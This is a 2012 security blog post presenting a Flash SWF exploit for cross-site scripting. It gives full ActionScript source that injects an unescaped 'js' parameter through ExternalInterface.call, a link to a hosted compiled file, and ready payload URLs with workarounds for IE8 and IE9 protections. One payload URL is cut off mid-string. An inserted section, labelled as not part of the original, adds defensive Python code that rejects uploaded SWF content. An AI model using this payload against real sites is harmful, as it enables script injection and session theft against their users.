On November 12, 2012, in Security Articles, Security Posts, by Soroush Dalili

As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to present this SWF file that you can use in your PoCs. This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox and IE9/8; there should not be any problem with other browsers either.

Note: IE has a protection that makes the "document" object inaccessible when you open a SWF directly in a browser. I have bypassed the IE8 protection by using a simple redirection in JavaScript. I have also found a noisy way to bypass the IE9 protection by opening a new window (you may be able to do it in a less noisy way; please leave your comments if you know any other bypass method).

Here is the ActionScript code:
package {
    import flash.display.Sprite;
    import flash.external.*;
    import flash.system.System;

    public class XSSProject extends Sprite {
        public function XSSProject() {
            // Allow the SWF to be scripted from any domain
            flash.system.Security.allowDomain("*");
            ExternalInterface.marshallExceptions = true;
            try {
                // The "js" FlashVar is spliced unescaped into the JavaScript wrapper that
                // ExternalInterface.call generates: the prefix closes the wrapper's try block,
                // the trailing comment swallows the rest of it (see [1])
                ExternalInterface.call("0);}catch(e){};" + root.loaderInfo.parameters.js + "///*PoC by Soroush Dalili @IRSDL - only for testing/educational purposes - He accepts no responsibility for any bad/malicious usage*/");
            } catch (e:Error) {
                trace(e);
            }
        }
    }
}
The compiled file is accessible via: http://0me.me/demo/xss/xssproject.swf

Examples:

Browsers other than IE:
http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain)

IE8:
http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){window.open('?js=history.go(-1)','_self');}

IE9:
http://0me.me/demo/xss/xssproject.swf?…ument.location);w.close();',1);
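The defensive counterpart, as an added example that is not part of the original post: a content-based upload check that recognises a SWF by its header bytes rather than by its filename, so a renamed SWF cannot be planted on the site's origin. The function names, the accept/reject policy and the sample byte strings are assumptions of this example; the header layout (three-byte signature, version byte, little-endian uint32 length) follows the SWF file format.

```python
import struct

# SWF header: bytes 0..2 are the signature (FWS = uncompressed, CWS = zlib,
# ZWS = LZMA), byte 3 is the SWF version, bytes 4..7 are the uncompressed
# file length as a little-endian uint32.
SWF_SIGNATURES = {b"FWS": "uncompressed", b"CWS": "zlib", b"ZWS": "lzma"}


def detect_swf(data: bytes):
    """Return (container, version, declared_length) when the bytes carry a SWF
    header, otherwise None. Any matching signature counts: the player does not
    care what the file was called or which Content-Type was advertised."""
    if len(data) < 8:
        return None
    container = SWF_SIGNATURES.get(data[:3])
    if container is None:
        return None
    version = data[3]
    declared_length = struct.unpack("<I", data[4:8])[0]
    return container, version, declared_length


def classify_upload(filename: str, data: bytes):
    """Policy for files that will be stored on the application's own origin.
    Returns ("reject", reason) or ("accept", None). Content wins over the
    extension: the XSS above only needs the SWF bytes to be served and rendered."""
    swf = detect_swf(data)
    if swf is not None:
        container, version, _ = swf
        return "reject", f"SWF content ({container}, v{version}) uploaded as {filename!r}"
    if filename.lower().endswith(".swf"):
        return "reject", "SWF extension without SWF content"
    return "accept", None


# Constructed samples (not real files): a CWS header claiming 1200 bytes, stored
# under an image name, and an innocuous PNG signature.
SAMPLE_SWF = b"CWS\x0a" + struct.pack("<I", 1200) + b"\x00" * 8
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8

if __name__ == "__main__":
    print(classify_upload("avatar.png", SAMPLE_SWF))  # rejected on content
    print(classify_upload("avatar.png", SAMPLE_PNG))  # accepted
```

Uploads that must remain renderable are better served from a separate, cookie-less origin, so that even a file this check misses cannot script the main site.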
References:

[1] The other reason to beware of ExternalInterface.call() (URL: http://lcamtuf.blogspot.co.uk/2011/03/other-reason-to-beware-of.html)

[2] Flash ExternalInterface.call() JavaScript Injection - can make the websites vulnerable to XSS (URL: http://soroush.secproject.com/blog/2011/03/flash-externalinterface-call-javascript-injection-%E2%80%93-can-make-the-websites-vulnerable-to-xss/)

From: http://soroush.secproject.com/blog/2012/11/xss-by-uploadingincluding-a-swf-file/